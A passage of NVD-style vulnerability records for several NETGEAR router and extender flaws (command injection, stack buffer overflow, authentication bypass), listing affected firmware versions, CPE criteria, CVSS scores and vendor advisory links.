R8500 before 1.0.2.110, R9000 before 1.0.2.52, WN2000RPTv3 before 1.0.1.14, WN3000RPv3 before 1.0.2.50, WN3100RPv2 before 1.0.0.40, WNDR3400v3 before 1.0.1.16, WNDR3700v4 before 1.0.2.94, WNDR4300 before 1.0.2.96, WNDR4300v2 before 1.0.0.50, WNDR4500v3 before 1.0.0.50, WNR1000v4 before 1.1.0.44, WNR2000v5 before 1.0.0.62, WNR2020 before 1.1.0.44, WNR2050 before 1.1.0.44, and WNR3500Lv2 before 1.2.0.46."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una inyecci\u00f3n de comandos por parte de un usuario autenticado. Esto afecta a D3600 versiones anteriores a 1.0.0.67, D6000 versiones anteriores a 1.0.0.67, D6100 versiones anteriores a 1.0.0.56, D6200 versiones anteriores a 1.1.00.24, D6220 versiones anteriores a 1.0.0.32, D6400 versiones anteriores a 1.0.0.66, D7000 versiones anteriores a 1.0.1.52, D7000v2 versiones anteriores a 1.0.0.44, D7800 versiones anteriores a 1.0.1.30, D8500 versiones anteriores a 1.0.3.35, DGN2200v4 versiones anteriores a 1.0.0.96, DGN2200Bv4 versiones anteriores a 1.0.0.96, EX2700 versiones anteriores a 1.0.1.28, EX6150v2 versiones anteriores a 1.0.1.54, EX6100v2 versiones anteriores a 1.0.1.54, EX6200v2 versiones anteriores a 1.0.1.52, EX6400 versiones anteriores a 1.0.1.72, EX7300 versiones anteriores a 1.0.1.72, EX8000 versiones anteriores a 1.0.0.102, JNR1010v2 versiones anteriores a 1.1.0.44, JWNR2010v5 versiones anteriores a 1.1.0.44, PR2000 versiones anteriores a 1.0.0.20, R6100 versiones anteriores a 1.0.1.20, R6250 versiones anteriores a 1.0.4.16, R6300v2 versiones anteriores a 1.0. 4.18, R6400 versiones anteriores a 1.0.1.32, R6400v2 versiones anteriores a 1.0.2.46, R6700 versiones anteriores a 1.0.1.36, R6900 versiones anteriores a 1.0.1.34, R7000 versiones anteriores a 1.0.9.18, R6900P versiones anteriores a 1.3.0.8, R7000P versiones anteriores a 1.3.0.8, R7100LG versiones anteriores a 1.0.0.34, R7300DST versiones anteriores a 1.0.0.58, R7500 versiones anteriores a 1.0.0.118, R7500v2 versiones anteriores a 1.0.3.24, R7800 versiones anteriores a 1.0.2.40, R7900 versiones anteriores a 1.0.2.4, R8000 versiones anteriores a 1.0.4.4_1.1.42, R7900P versiones anteriores a 1.1.5.14, R8000P versiones anteriores a 1.1.5.14, R8300 versiones anteriores a 1.0.2.110, R8500 versiones anteriores a 1.0.2.110, R9000 versiones anteriores a 1.0.2.52, WN2000RPTv3 versiones anteriores a 1.0.1.14, WN3000RPv3 versiones anteriores a 1.0.2.50, WN3100RPv2 versiones anteriores a 1.0.0.40, WNDR3400v3 versiones anteriores a 1.0.1.16, WNDR3700v4 versiones anteriores a 1.0. 2.94, WNDR4300 versiones anteriores a 1.0.2.96, WNDR4300v2 versiones anteriores a 1.0.0.50, WNDR4500v3 versiones anteriores a 1.0.0.50, WNR1000v4 versiones anteriores a 1.1.0.44, WNR2000v5 versiones anteriores a 1.0.0.62, WNR2020 versiones anteriores a 1.1.0.44, WNR2050 versiones anteriores a 1.1.0.44 y WNR3500Lv2 versiones anteriores a 1.2.04 ."
}
],
"id": "CVE-2017-18788",
"lastModified": "2024-11-21T03:20:55.460",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-22T14:15:11.817",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049527/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2947"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049527/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2947"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-74"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 19:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D8500 before 1.0.3.44, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, and R8500 before 1.0.2.128.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | d8500_firmware | * | |
| netgear | d8500 | - | |
| netgear | r6250_firmware | * | |
| netgear | r6250 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r6900p_firmware | * | |
| netgear | r6900p | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7000p_firmware | * | |
| netgear | r7000p | - | |
| netgear | r7100lg_firmware | * | |
| netgear | r7100lg | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r7900p_firmware | * | |
| netgear | r7900p | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8000p_firmware | * | |
| netgear | r8000p | - | |
| netgear | r8300_firmware | * | |
| netgear | r8300 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C329B7CB-1281-480D-BDDB-E222044D715E",
"versionEndExcluding": "1.0.3.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E1DD1F7D-7556-4B95-A33F-E389948D20AA",
"versionEndExcluding": "1.0.4.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E997B769-B2F7-4BB5-A834-96A68EF842BA",
"versionEndExcluding": "1.0.4.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8BF91E85-8869-4421-8748-C7856C06435B",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD6FD0FE-1431-4E39-8D07-B4AFE5BDB1B6",
"versionEndExcluding": "1.0.2.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E921ACD-4ED9-4FFD-AF96-F2E1D75F8C96",
"versionEndExcluding": "1.0.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "103B19E9-C72D-43C2-8369-1C425E9B9AC7",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6156A20E-83E6-44AD-9A57-40E3249047D4",
"versionEndExcluding": "1.0.9.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E23D8A41-75D8-4067-A961-3B81276527A8",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0870C337-6BCE-4197-A9DE-6CED2B45AD58",
"versionEndExcluding": "1.0.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F168C3F8-F77C-4918-A752-9A04CED2349E",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "845CF217-8361-4D5B-811D-B9CEB68880CB",
"versionEndExcluding": "1.0.3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8BBB7E16-D31C-49EA-9D82-D3BACED95441",
"versionEndExcluding": "1.4.1.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "98FAEBDA-5FBA-402D-9BA1-25E5DF4EF55F",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6791754E-E5F9-42EA-AFDA-F93E8227A7C8",
"versionEndExcluding": "1.4.1.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FD0AB065-3152-492B-A66D-2BCCA1E3B1DA",
"versionEndExcluding": "1.0.2.128",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "28EC6190-68BC-4D9A-9973-01935EB3472F",
"versionEndExcluding": "1.0.2.128",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D8500 before 1.0.3.44, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, and R8500 before 1.0.2.128."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria por parte de un usuario autenticado. Esto afecta a D8500 versiones anteriores a 1.0.3.44, R6250 versiones anteriores a 1.0.4.34, R6300v2 versiones anteriores a 1.0.4.32, R6400 versiones anteriores a 1.0.1.46, R6700 versiones anteriores a 1.0.2.6, R6900 versiones anteriores a 1.0.2.4, R6900P versiones anteriores a 1.3.1.64, R7000 versiones anteriores a 1.0.9.42, R7000P versiones anteriores a 1. 3.1.64, R7100LG versiones anteriores a 1.0.0.50, R7300DST versiones anteriores a 1.0.0.70, R7900 versiones anteriores a 1.0.3.8, R7900P versiones anteriores a 1.4.1.30, R8000 versiones anteriores a 1.0.4.28, R8000P versiones anteriores a 1.4.1.30, R8300 versiones anteriores a 1.0.2.128, y R8500 versiones anteriores a 1.0.2.128."
}
],
"id": "CVE-2019-20713",
"lastModified": "2024-11-21T04:39:09.657",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 5.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T19:15:24.713",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061215/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0253"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061215/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0253"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-23 16:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7100lg_firmware | * | |
| netgear | r7100lg | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8300_firmware | * | |
| netgear | r8300 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - | |
| netgear | wndr3400_firmware | * | |
| netgear | wndr3400 | v3 | |
| netgear | wnr3500l_firmware | * | |
| netgear | wnr3500l | v2 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8097CEE-2577-4C44-9260-8B2DD2D2CA78",
"versionEndExcluding": "1.0.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7084EC75-5CAB-4EB3-BAED-00BFF80F71D9",
"versionEndExcluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AA5CCA76-ED97-4B2E-AB06-9C9F375F7C81",
"versionEndExcluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E7A7A9C9-3505-440C-8806-E48AB316C2CC",
"versionEndExcluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B94C2A0A-F26B-4CD2-A91E-DD62C5F788B3",
"versionEndExcluding": "1.0.7.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "833A98AF-A4B0-4C68-AACD-6B3F58E64060",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "02C2BB4F-8FBB-47BF-A05F-72DDC2D0A31B",
"versionEndExcluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "628B45E0-EAE3-4ACD-82EC-8E2250F885BB",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B91B7AB8-E499-416D-8E63-C49CDA753C3C",
"versionEndExcluding": "1.0.3.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A18E8950-B107-4050-AFEF-30C20F6166FA",
"versionEndExcluding": "1.0.2.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58EFB06D-AD59-4F40-B6EC-BD3C1BCACE7A",
"versionEndExcluding": "1.0.2.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
